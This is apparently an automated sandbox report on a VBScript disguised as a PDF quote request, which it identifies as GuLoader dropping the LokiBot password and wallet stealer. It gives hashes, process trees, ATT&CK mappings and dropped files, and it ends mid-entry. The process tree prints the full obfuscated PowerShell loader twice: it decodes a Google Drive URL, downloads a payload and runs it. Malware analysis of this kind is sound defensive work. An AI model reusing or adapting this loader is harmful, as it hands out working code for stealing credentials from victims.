guloader | 03a24fb6fcf36d76df6ed2eb9fbf249b71c0b33bac9a723aa6337ff19bdcebf9

Analysis

max time kernel
141s
max time network
129s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16-04-2024 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RFQ_2414976·pdf.vbs
Size

361KB
MD5

a8bbe905610f17161af68ea8aab57592
SHA1

6a85ada10ba962b10c07955b2f73700842b4932b
SHA256

03a24fb6fcf36d76df6ed2eb9fbf249b71c0b33bac9a723aa6337ff19bdcebf9
SHA512

07a76fd2257c22efb7858573035501ad0e9d55a380e7a213564bfe18eaa4f9f43e8f00a22d50b7d13a1ce9dc30ba1f234e131e03a14a67e91b27918c79059576
SSDEEP

6144:xnILaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkP4:h5InOiAZvXAw

Score

10^/10

guloader lokibot collection downloader spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 1504 WScript.exe
7 888 powershell.exe
9 888 powershell.exe

flow	pid	process
3	1504	WScript.exe
7	888	powershell.exe
9	888	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

7 drive.google.com
11 drive.google.com
6 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

2856 wab.exe
2856 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2172 powershell.exe
2856 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2172 set thread context of 2856 2172 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

888 powershell.exe
2172 powershell.exe
2172 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2172 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 888 powershell.exe
Token: SeDebugPrivilege 2172 powershell.exe
Token: SeDebugPrivilege 2856 wab.exe

flow	ioc
7	drive.google.com
11	drive.google.com
6	drive.google.com

pid	process
2856	wab.exe
2856	wab.exe

pid	process
2172	powershell.exe
2856	wab.exe

description	pid	process	target process
PID 2172 set thread context of 2856	2172	powershell.exe	wab.exe

pid	process
888	powershell.exe
2172	powershell.exe
2172	powershell.exe

pid	process
2172	powershell.exe

description	pid	process
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	2856	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1504 wrote to memory of 888	1504	WScript.exe	powershell.exe
PID 1504 wrote to memory of 888	1504	WScript.exe	powershell.exe
PID 1504 wrote to memory of 888	1504	WScript.exe	powershell.exe
PID 888 wrote to memory of 2116	888	powershell.exe	cmd.exe
PID 888 wrote to memory of 2116	888	powershell.exe	cmd.exe
PID 888 wrote to memory of 2116	888	powershell.exe	cmd.exe
PID 888 wrote to memory of 2172	888	powershell.exe	powershell.exe
PID 888 wrote to memory of 2172	888	powershell.exe	powershell.exe
PID 888 wrote to memory of 2172	888	powershell.exe	powershell.exe
PID 888 wrote to memory of 2172	888	powershell.exe	powershell.exe
PID 2172 wrote to memory of 2588	2172	powershell.exe	cmd.exe
PID 2172 wrote to memory of 2588	2172	powershell.exe	cmd.exe
PID 2172 wrote to memory of 2588	2172	powershell.exe	cmd.exe
PID 2172 wrote to memory of 2588	2172	powershell.exe	cmd.exe
PID 2172 wrote to memory of 2856	2172	powershell.exe	wab.exe
PID 2172 wrote to memory of 2856	2172	powershell.exe	wab.exe
PID 2172 wrote to memory of 2856	2172	powershell.exe	wab.exe
PID 2172 wrote to memory of 2856	2172	powershell.exe	wab.exe
PID 2172 wrote to memory of 2856	2172	powershell.exe	wab.exe
PID 2172 wrote to memory of 2856	2172	powershell.exe	wab.exe

outlook_office_path 1 IoCs

Processes:

wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe

outlook_win_path 1 IoCs

Processes:

wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_2414976·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Underglaze112 = 1;$erstatningsretlig='Substrin';$erstatningsretlig+='g';Function Astenis54($Cahincic){$Hypoed=$Cahincic.Length-$Underglaze112;For($Cuban=7; $Cuban -lt $Hypoed; $Cuban+=(8)){$Grapefrugtsaft+=$Cahincic.$erstatningsretlig.Invoke($Cuban, $Underglaze112);}$Grapefrugtsaft;}function Spsk($Adiadochokinesia){. ($Tetraglottic) ($Adiadochokinesia);}$Ilona=Astenis54 'RvbaldeMNundinaoBrugerszBommesiiPriaca.lKontorsl Skarp.aTelefon/Svanekn5trommer.Nonou,r0scowrat S,ifte(HymnernWGabbliniSvovlblnJuraprodFamili,o LenticwSnydss,sB,spare tan,emiNnonp rmT Metrol Strep.o1 Sy tem0Bloodst.Porta,e0Precept;Morren SomatosWAvianisi MeningnUntrag.6R.sista4 Gantan;Bl,ffma Transamx Spille6Bocc as4 lakevr; Di.tin GennemsrDativervKva,tet:Twitsom1Termitt2Copro,h1N,nprot.Markust0B,milll) Metall Qu,nnaGRevlen,e Afban.cSpninxekBlyanteoDykkerk/ Afs.in2Arveord0 .frens1almohad0Quednes0,utpopo1 Udvlge0Mul ipl1Unpe.ce C bblesFFor,jniiPjattenrlnniveaeCalculifElegiaco UdvalgxRevolut/Nonemph1prosate2Sa.ment1Siskene.Tunnelm0Sponsor ';$Egyptisk=Astenis54 't.legraU AchmetsMar edseRegionprSolistv- informA uturolgCykeltae obliqunBaskeret Fusion ';$Arkaiserende=Astenis54 'UnderclhanthroptF rdelatFuldemapmettinesT avspo:D,gonun/Cata,on/Dum,ingd Si.catrUnderbei ExtendvTraitoreAfstump.TvesindgSkalleroUdviklioUnsuggegPresoaklFarveske Floody. hzbittcAldolasoQuinacrmAfsvaln/BacteriuUnddr.gc.angarb? DeploreFungusyxMatcherpAswailtoDame.rir,nerrabtSprogre=HuskwordRe,visio BakterwSp.erocn.attishl langtuoHaloablaFryde udLetharg&Sengetritekstf,dEustaki= Coo ho1 PrephtGScenaricZeisttr0AfdankeERaadsna6GregoskcVortice6SlutresfLiberti1Indd.ivo KbenhadA serti8GudbarnPLeguminhJulenisk Legha,W S,turijGallashXLysforhFPredispa Propit4Unt.mpe4Sjof,ltwtelete,W GullliDTeahousZ RodskupSyntoniB lrieasKTepoysstdisaffivAbekostbMockery ';$Tabskonto=Astenis54 'Sulphet>Oste.ma ';$Tetraglottic=Astenis54 'AfrenseiUnd,rsteRot,endxUnsatis ';$Rigeliges = Astenis54 'Be,lerbeCorseprcGyvingahForlystoMa.duin Avantga%Incommoa,odhjerpLeviti.p HerrerdBarkedra Amarant DialysaByraads%Droskec\PrancerH Unstr.eHonduralServeridSta.mdrtChurchieByggerer ivaanenPlatteriBrudsiknRe atakg rodukteInv.gilrPeru.abnUnunit e.latitusAnteamb.ArtinesIdemiadunSvinekavt abena Mildnes&S ksebe&Par.ren SynsneeDatalogcPellarjhErnringo Bud ho Posi iv$Sangsva ';Spsk (Astenis54 'P ovins$Lactamig Impas l Sgeko,oPlan.evb SacchaaRecerptlSvuppen: Tske,eUFlipoveg Formant Kalk,lh SlaptveTossuprdUnb,traeDifferenBilledb=Undersk( onformcCrepuscmKonditodUselska Hvidtek/HelplescPhilona Dichlor$AdminisRKa issaigu,stigg Indelee Nonda lB rnersiFungistgQuietlieDormants Drstjd)Ulv tae ');Spsk (Astenis54 'Incurab$udsa,hegFetishilTurbinaoPerronebTeleostaObsessilTu.ercu:Bekla,eUfi lingn llersadQ inqueeFadelesrPie,ruskAtomicilC mplex=ska ele$haplylaAViceborrFarveatkStrobedaOmdigtniTricusssEnsi,age,ineastrHenre,teRetentinMolestedEgenarte,fsvovl.,asedresAfkoblip ,utfitlKorsik.i Scir,htOutcurs(Prjsere$UnbudgeT,ordbunad.sassobDetronisS,enderkFinlandoBedsidenDanmar.tA ktionoConchol)Hypothe ');$Arkaiserende=$Underkl[0];Spsk (Astenis54 'Klvede $dummeregOrganoslEle.ancoInddrivbM,gentaaHjemgivlStumpha:PennileSSprogfok Arbitrrun ppliiB.jlendgIndviklhJoviallaTanderplCognoscsTonjesu= AalbksNQuartereHe,atizw Reconc-DatabasO IntrodbElucidajTophphieIndividc HeidlvtK orami AsbestcSForstrkyen,erocs UnitistSkrmydseAndrasumSca,ter.BlomsteNflorereemarked,tFyldeka.RebreduW Rvesv.eAsiaticboutr ggCEssentilEnte,taiUnrustieDispersnOverru tsmileba ');Spsk (Astenis54 'Ekspekt$UnfirepS,iskettkUlidelir Tabu aiOrchidogMejs.lshUdsavenaPu,dlellCyniatrsBu,ding.MbleresHStaphyle Allit,aSkeformdSkyndteeHeparinrKdensbisRendere[As igma$PolakkeEAkillesg.ahflyty Dieta,pDatakabtWhoosisiLossep s FortrskPyroidb] ,recol=Over it$TennisaICorninglVillab.oCo udicnprimoviaStrutsk ');$Poientere=Astenis54 'I dstniSFyrlamikTrommesrSnit rni Herresgfrdigb.h PerennaSo skinlEquinessBlens,u. TranspDUdpantno PicoliwDomhusenBleep dlFrasef.oBoblepaaNedgr ad,ldritcFInjust,iT,enestlKnacksee Nonste(Pritche$ NdstilAS,raberr BrygpokEfter aaT.ansitiBolighasBowersbeModerstrVedv,reeFireet,n Trien.dSiegli.eLoddern,Kon,ooe$OvernigN Nonfato ExogamcSalumskiExodermclsladele,prgelupForfeittUdadveniPulpingvKoloniseLiguste)Unjudi, ';$Poientere=$Ugtheden[1]+$Poientere;$Nociceptive=$Ugtheden[0];Spsk (Astenis54 ' ecipro$CauterigBengalil ForbruoErhvervbSpurneraMenne.kl Kontr :Snedke.LMajesttoCorn.tovPipistro avestrnorsk sdLuksusj1Kubikin4 Skisky=udelika(DesertfTSmpistoeInfectisBengnavt iskred-Fly,iraPconnexiadekl,ratAl rmtihPiggede Stkkes$PufferiNBlazingohjestercLangfini,mpostecErfarineAftaletpAntipartKrablehiValan.evCoendureSkandin)Ubaa es ');while (!$Lovord14) {Spsk (Astenis54 'Plainta$Deserteg OmstrulCaliphso Flow,rbdanuriraAf yrinlMi,redd:Perine SAlbacorkMyogloba Pla koaFlut.stnBurweedsPhanerol S ksmeeEn.otelnAckeyja=Slikmu,$U,redstt A.sailrSing.eduHjerteke Brydso ') ;Spsk $Poientere;Spsk (Astenis54 ' TallowS NvningtAndelsbaStenzekr .progltafkrfte-Sup,rfoSCosmo,flprivatieAbruptieRidderspFolke,a Respons4 upaa.r ');Spsk (Astenis54 'Taffyli$ TopplagAcidophl ObligaochunterbBrevsa,a F,ushelForhold:Syndig,L SulphooUnaturlv RuineroTeskeesrAfsbenddStadsin1Suppler4Baby it=Formand(Trane.oTUdmejsleMorindos S edtatEfterbe-DegradaP netstjaSmmenestLamprophBaggrun Ins,in$SyntagmNPalstinoPersei.cR ernoniEm,irekcZippereeTil,nnepAlnascht OrientiKapitalvDmmesygeVildspo) Bev.el ') ;Spsk (Astenis54 'Indflyv$Zoo porg Ldrebol For,ano ,idsskbSrstil,aFoulneslSalamie:BenjasaBPiaroaarRai,coaaRo.kildnPadesoynPrinteriK,ldslonBucketeeBlikkensTesse,asAtomrea= Botan $ UngaregGl,msellFeastfuo KulmulbVisseluaMaracanlIkl tes:Dubled,PDeliciorS.arporiAcritolnaffladecRevi ioePrebudgsNonsymbsscattiee Plager2Balkons0Slgtsre2Hemipar+U gange+Kromoso%sub,pte$.limhinUTils annSepuchrdCentrodeIliocosrUnterrek NasrollThermor.Upbri.gc ForulyoKabelfauPostponn UdholdtVkstc.n ') ;$Arkaiserende=$Underkl[$Branniness];}Spsk (Astenis54 'Crucife$A,tichagb nradslGrammatoCafe erbTerminsaRederislmarinat:Ado phuSAntiecca Luf foeKon emntsclerocnAppellai Didactn Rev,brg HandeleWoefullrUhandlenUnalleve Hydrob Formosa=Exactin Ang raiGPartibleCarapidtInvent -AftrdelCIndirecoDamptron Rummaat TariffeEdhathlnTegnehatOpbygge ,wattl$MananasNconf.rmoMedistecCravingi .adavecOctang.eUrusmorpInterortThaietjiPinchinvTars,maeReolplj ');Spsk (Astenis54 'Campbel$b svrligHandw,ilEneboeroIndicatb D.precaRecompolSagn,re:tige,stH KildeaaHummersr RegnawmExpurgafGout esu Elektrlminerallsandblsy Sinist ,eeshs=vundere Augm.nt[P.eenacSCeratinyGenmanisOriginatAnna meeSciama mTilbyde.VareforC,nbraceoEnecatenUdenri,v,pyfauleApostolr Vre setVkst.us] Nazibo:Herbman:LeacherFEvadeblrArgeerso IndkobmSprydstBsej rknaAi.wardsmagtposegjalden6Amphid.4sammenpSFrysnintLoxodror DismemiSubkultnBrandsig ylene(tigersp$LegitimSskriveraPliredee AutokrtUndertinStyrtn,iRutgersnCyclo ogGroins eMathemar Milj,encaigreeeSt mmep)Nontrad ');Spsk (Astenis54 'Interpe$VaginifgMet titlafbeny.oUnwiglrbFallin aUdhuledl Hughsd: AritmeSDumdumboF ctorsu At,rahp BeeveseRebateur Pneo esRevalid Edv rdt=intra a Bedre,s[ UnstatS,otatioyYolkyovsM,lilaltTyvenefeEscapeemBudcent.FljtersTUnderlieh.rtugixChr nostBedamne.HawsingETayramonReservacs.questo SemifedTeoridaiNonoccunGlandulgTriduam]Spadeli:tru.don:AndengrAEp.tafeSGobsmacCStfron IOverstrIIndfrel.DelistiGDimethyeTransmitUnti fiSTollhaltOrganetrKlunkeniLeukorrnSystemugAmfibie(Try,blg$PreemplHG yntera TrkvinrIngathemSkovbruf jalo suSkrukkel sochaslZoileanyTal,owy)T gnerm ');Spsk (Astenis54 'Un,erga$LignescgSladrevlKraftvao Wa erbbP.ncheba Rancefl Y.glin:ExsertiSNeuroselpuffer eCosmogesGenin,kvKneppeniOoziestgS,utninsUnprettk aerdile Aflvni=Multipr$Kall grS gameleokomp ktuMinglinpOkapiere bookstrRaagesbsToetage. VasomosKompa,tuFuskerebDer,atosForretnt AlmemorassentaiPronominhafiztagEpic ut( Lovfor3Cutinsu2 For rf8 Opblom1Fliseeg0Necrolo2Semiret, Mes my2Fdrelan9antho,i6 U,enac1 Flamin7 Trauma)Glasfib ');Spsk $Slesvigske;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Heldterningernes.Inv && echo $"
3⤵
PID:2116

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Underglaze112 = 1;$erstatningsretlig='Substrin';$erstatningsretlig+='g';Function Astenis54($Cahincic){$Hypoed=$Cahincic.Length-$Underglaze112;For($Cuban=7; $Cuban -lt $Hypoed; $Cuban+=(8)){$Grapefrugtsaft+=$Cahincic.$erstatningsretlig.Invoke($Cuban, $Underglaze112);}$Grapefrugtsaft;}function Spsk($Adiadochokinesia){. ($Tetraglottic) ($Adiadochokinesia);}$Ilona=Astenis54 'RvbaldeMNundinaoBrugerszBommesiiPriaca.lKontorsl Skarp.aTelefon/Svanekn5trommer.Nonou,r0scowrat S,ifte(HymnernWGabbliniSvovlblnJuraprodFamili,o LenticwSnydss,sB,spare tan,emiNnonp rmT Metrol Strep.o1 Sy tem0Bloodst.Porta,e0Precept;Morren SomatosWAvianisi MeningnUntrag.6R.sista4 Gantan;Bl,ffma Transamx Spille6Bocc as4 lakevr; Di.tin GennemsrDativervKva,tet:Twitsom1Termitt2Copro,h1N,nprot.Markust0B,milll) Metall Qu,nnaGRevlen,e Afban.cSpninxekBlyanteoDykkerk/ Afs.in2Arveord0 .frens1almohad0Quednes0,utpopo1 Udvlge0Mul ipl1Unpe.ce C bblesFFor,jniiPjattenrlnniveaeCalculifElegiaco UdvalgxRevolut/Nonemph1prosate2Sa.ment1Siskene.Tunnelm0Sponsor ';$Egyptisk=Astenis54 't.legraU AchmetsMar edseRegionprSolistv- informA uturolgCykeltae obliqunBaskeret Fusion ';$Arkaiserende=Astenis54 'UnderclhanthroptF rdelatFuldemapmettinesT avspo:D,gonun/Cata,on/Dum,ingd Si.catrUnderbei ExtendvTraitoreAfstump.TvesindgSkalleroUdviklioUnsuggegPresoaklFarveske Floody. hzbittcAldolasoQuinacrmAfsvaln/BacteriuUnddr.gc.angarb? DeploreFungusyxMatcherpAswailtoDame.rir,nerrabtSprogre=HuskwordRe,visio BakterwSp.erocn.attishl langtuoHaloablaFryde udLetharg&Sengetritekstf,dEustaki= Coo ho1 PrephtGScenaricZeisttr0AfdankeERaadsna6GregoskcVortice6SlutresfLiberti1Indd.ivo KbenhadA serti8GudbarnPLeguminhJulenisk Legha,W S,turijGallashXLysforhFPredispa Propit4Unt.mpe4Sjof,ltwtelete,W GullliDTeahousZ RodskupSyntoniB lrieasKTepoysstdisaffivAbekostbMockery ';$Tabskonto=Astenis54 'Sulphet>Oste.ma ';$Tetraglottic=Astenis54 'AfrenseiUnd,rsteRot,endxUnsatis ';$Rigeliges = Astenis54 'Be,lerbeCorseprcGyvingahForlystoMa.duin Avantga%Incommoa,odhjerpLeviti.p HerrerdBarkedra Amarant DialysaByraads%Droskec\PrancerH Unstr.eHonduralServeridSta.mdrtChurchieByggerer ivaanenPlatteriBrudsiknRe atakg rodukteInv.gilrPeru.abnUnunit e.latitusAnteamb.ArtinesIdemiadunSvinekavt abena Mildnes&S ksebe&Par.ren SynsneeDatalogcPellarjhErnringo Bud ho Posi iv$Sangsva ';Spsk (Astenis54 'P ovins$Lactamig Impas l Sgeko,oPlan.evb SacchaaRecerptlSvuppen: Tske,eUFlipoveg Formant Kalk,lh SlaptveTossuprdUnb,traeDifferenBilledb=Undersk( onformcCrepuscmKonditodUselska Hvidtek/HelplescPhilona Dichlor$AdminisRKa issaigu,stigg Indelee Nonda lB rnersiFungistgQuietlieDormants Drstjd)Ulv tae ');Spsk (Astenis54 'Incurab$udsa,hegFetishilTurbinaoPerronebTeleostaObsessilTu.ercu:Bekla,eUfi lingn llersadQ inqueeFadelesrPie,ruskAtomicilC mplex=ska ele$haplylaAViceborrFarveatkStrobedaOmdigtniTricusssEnsi,age,ineastrHenre,teRetentinMolestedEgenarte,fsvovl.,asedresAfkoblip ,utfitlKorsik.i Scir,htOutcurs(Prjsere$UnbudgeT,ordbunad.sassobDetronisS,enderkFinlandoBedsidenDanmar.tA ktionoConchol)Hypothe ');$Arkaiserende=$Underkl[0];Spsk (Astenis54 'Klvede $dummeregOrganoslEle.ancoInddrivbM,gentaaHjemgivlStumpha:PennileSSprogfok Arbitrrun ppliiB.jlendgIndviklhJoviallaTanderplCognoscsTonjesu= AalbksNQuartereHe,atizw Reconc-DatabasO IntrodbElucidajTophphieIndividc HeidlvtK orami AsbestcSForstrkyen,erocs UnitistSkrmydseAndrasumSca,ter.BlomsteNflorereemarked,tFyldeka.RebreduW Rvesv.eAsiaticboutr ggCEssentilEnte,taiUnrustieDispersnOverru tsmileba ');Spsk (Astenis54 'Ekspekt$UnfirepS,iskettkUlidelir Tabu aiOrchidogMejs.lshUdsavenaPu,dlellCyniatrsBu,ding.MbleresHStaphyle Allit,aSkeformdSkyndteeHeparinrKdensbisRendere[As igma$PolakkeEAkillesg.ahflyty Dieta,pDatakabtWhoosisiLossep s FortrskPyroidb] ,recol=Over it$TennisaICorninglVillab.oCo udicnprimoviaStrutsk ');$Poientere=Astenis54 'I dstniSFyrlamikTrommesrSnit rni Herresgfrdigb.h PerennaSo skinlEquinessBlens,u. TranspDUdpantno PicoliwDomhusenBleep dlFrasef.oBoblepaaNedgr ad,ldritcFInjust,iT,enestlKnacksee Nonste(Pritche$ NdstilAS,raberr BrygpokEfter aaT.ansitiBolighasBowersbeModerstrVedv,reeFireet,n Trien.dSiegli.eLoddern,Kon,ooe$OvernigN Nonfato ExogamcSalumskiExodermclsladele,prgelupForfeittUdadveniPulpingvKoloniseLiguste)Unjudi, ';$Poientere=$Ugtheden[1]+$Poientere;$Nociceptive=$Ugtheden[0];Spsk (Astenis54 ' ecipro$CauterigBengalil ForbruoErhvervbSpurneraMenne.kl Kontr :Snedke.LMajesttoCorn.tovPipistro avestrnorsk sdLuksusj1Kubikin4 Skisky=udelika(DesertfTSmpistoeInfectisBengnavt iskred-Fly,iraPconnexiadekl,ratAl rmtihPiggede Stkkes$PufferiNBlazingohjestercLangfini,mpostecErfarineAftaletpAntipartKrablehiValan.evCoendureSkandin)Ubaa es ');while (!$Lovord14) {Spsk (Astenis54 'Plainta$Deserteg OmstrulCaliphso Flow,rbdanuriraAf yrinlMi,redd:Perine SAlbacorkMyogloba Pla koaFlut.stnBurweedsPhanerol S ksmeeEn.otelnAckeyja=Slikmu,$U,redstt A.sailrSing.eduHjerteke Brydso ') ;Spsk $Poientere;Spsk (Astenis54 ' TallowS NvningtAndelsbaStenzekr .progltafkrfte-Sup,rfoSCosmo,flprivatieAbruptieRidderspFolke,a Respons4 upaa.r ');Spsk (Astenis54 'Taffyli$ TopplagAcidophl ObligaochunterbBrevsa,a F,ushelForhold:Syndig,L SulphooUnaturlv RuineroTeskeesrAfsbenddStadsin1Suppler4Baby it=Formand(Trane.oTUdmejsleMorindos S edtatEfterbe-DegradaP netstjaSmmenestLamprophBaggrun Ins,in$SyntagmNPalstinoPersei.cR ernoniEm,irekcZippereeTil,nnepAlnascht OrientiKapitalvDmmesygeVildspo) Bev.el ') ;Spsk (Astenis54 'Indflyv$Zoo porg Ldrebol For,ano ,idsskbSrstil,aFoulneslSalamie:BenjasaBPiaroaarRai,coaaRo.kildnPadesoynPrinteriK,ldslonBucketeeBlikkensTesse,asAtomrea= Botan $ UngaregGl,msellFeastfuo KulmulbVisseluaMaracanlIkl tes:Dubled,PDeliciorS.arporiAcritolnaffladecRevi ioePrebudgsNonsymbsscattiee Plager2Balkons0Slgtsre2Hemipar+U gange+Kromoso%sub,pte$.limhinUTils annSepuchrdCentrodeIliocosrUnterrek NasrollThermor.Upbri.gc ForulyoKabelfauPostponn UdholdtVkstc.n ') ;$Arkaiserende=$Underkl[$Branniness];}Spsk (Astenis54 'Crucife$A,tichagb nradslGrammatoCafe erbTerminsaRederislmarinat:Ado phuSAntiecca Luf foeKon emntsclerocnAppellai Didactn Rev,brg HandeleWoefullrUhandlenUnalleve Hydrob Formosa=Exactin Ang raiGPartibleCarapidtInvent -AftrdelCIndirecoDamptron Rummaat TariffeEdhathlnTegnehatOpbygge ,wattl$MananasNconf.rmoMedistecCravingi .adavecOctang.eUrusmorpInterortThaietjiPinchinvTars,maeReolplj ');Spsk (Astenis54 'Campbel$b svrligHandw,ilEneboeroIndicatb D.precaRecompolSagn,re:tige,stH KildeaaHummersr RegnawmExpurgafGout esu Elektrlminerallsandblsy Sinist ,eeshs=vundere Augm.nt[P.eenacSCeratinyGenmanisOriginatAnna meeSciama mTilbyde.VareforC,nbraceoEnecatenUdenri,v,pyfauleApostolr Vre setVkst.us] Nazibo:Herbman:LeacherFEvadeblrArgeerso IndkobmSprydstBsej rknaAi.wardsmagtposegjalden6Amphid.4sammenpSFrysnintLoxodror DismemiSubkultnBrandsig ylene(tigersp$LegitimSskriveraPliredee AutokrtUndertinStyrtn,iRutgersnCyclo ogGroins eMathemar Milj,encaigreeeSt mmep)Nontrad ');Spsk (Astenis54 'Interpe$VaginifgMet titlafbeny.oUnwiglrbFallin aUdhuledl Hughsd: AritmeSDumdumboF ctorsu At,rahp BeeveseRebateur Pneo esRevalid Edv rdt=intra a Bedre,s[ UnstatS,otatioyYolkyovsM,lilaltTyvenefeEscapeemBudcent.FljtersTUnderlieh.rtugixChr nostBedamne.HawsingETayramonReservacs.questo SemifedTeoridaiNonoccunGlandulgTriduam]Spadeli:tru.don:AndengrAEp.tafeSGobsmacCStfron IOverstrIIndfrel.DelistiGDimethyeTransmitUnti fiSTollhaltOrganetrKlunkeniLeukorrnSystemugAmfibie(Try,blg$PreemplHG yntera TrkvinrIngathemSkovbruf jalo suSkrukkel sochaslZoileanyTal,owy)T gnerm ');Spsk (Astenis54 'Un,erga$LignescgSladrevlKraftvao Wa erbbP.ncheba Rancefl Y.glin:ExsertiSNeuroselpuffer eCosmogesGenin,kvKneppeniOoziestgS,utninsUnprettk aerdile Aflvni=Multipr$Kall grS gameleokomp ktuMinglinpOkapiere bookstrRaagesbsToetage. VasomosKompa,tuFuskerebDer,atosForretnt AlmemorassentaiPronominhafiztagEpic ut( Lovfor3Cutinsu2 For rf8 Opblom1Fliseeg0Necrolo2Semiret, Mes my2Fdrelan9antho,i6 U,enac1 Flamin7 Trauma)Glasfib ');Spsk $Slesvigske;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Heldterningernes.Inv && echo $"
4⤵
PID:2588

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
8736301cd988e3e3556b2276b3e7a0ac

SHA1
13f2a26d32dc2a02e3698f9496460d78a991be7b

SHA256
eb45576079f466d0baf7cec5a6a38a527ba0d76f60dd928318b4a53c316fb7be

SHA512
65ff574d06d9d8b0f45bb56d90b47329d9760bad147d3ce9b7f75882d90f7f11b6fd2b402de1d7dc541b6743a4179879fd1b6c88f9258e7e27e99d8e342c8adb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Skjorteknap.txt
Filesize
7KB

MD5
1e1101ab36edd63ace75970202d9b1ef

SHA1
8daa06506a56d269f865f9bb8f22e4a44fdfa2c8

SHA256
694eb88caae53adbfee2ec3eb8976ab21a294f27f1b8d303883e71977e09affe

SHA512
0d9b674997fb5a72d403e27011ba67dc6d7c09be134aba85b4dfb5df0e6dfd145d4db1c4ade0aa850cb02da5b1b7f9f801e5de799f8eaba0abfbe73f5978f34b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Skjorteknap.txt
Filesize
130B

MD5
28c8409d263768e59b47a9ca8093fe3a

SHA1
06d1e00f80e77cbef673ee84f12247ef30c9d17d

SHA256
356db548f2325beb3076758a5532fa7d47e511b9c1fde699e851768e3d869dd6

SHA512
b14696cfcfe15093bafd881681004de097534cabb68d6c46075395492eb96ff13decff24a95554ac3f02f39d72c92f1f74cced697dc4593578bcfa259f672bf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Skjorteknap.txt
Filesize
2KB

MD5
ab64ca2ec19b41c72d6ff0de12b30142

SHA1
2772ecc467711b8c421a87cf2a0887336b8f1bd8

SHA256
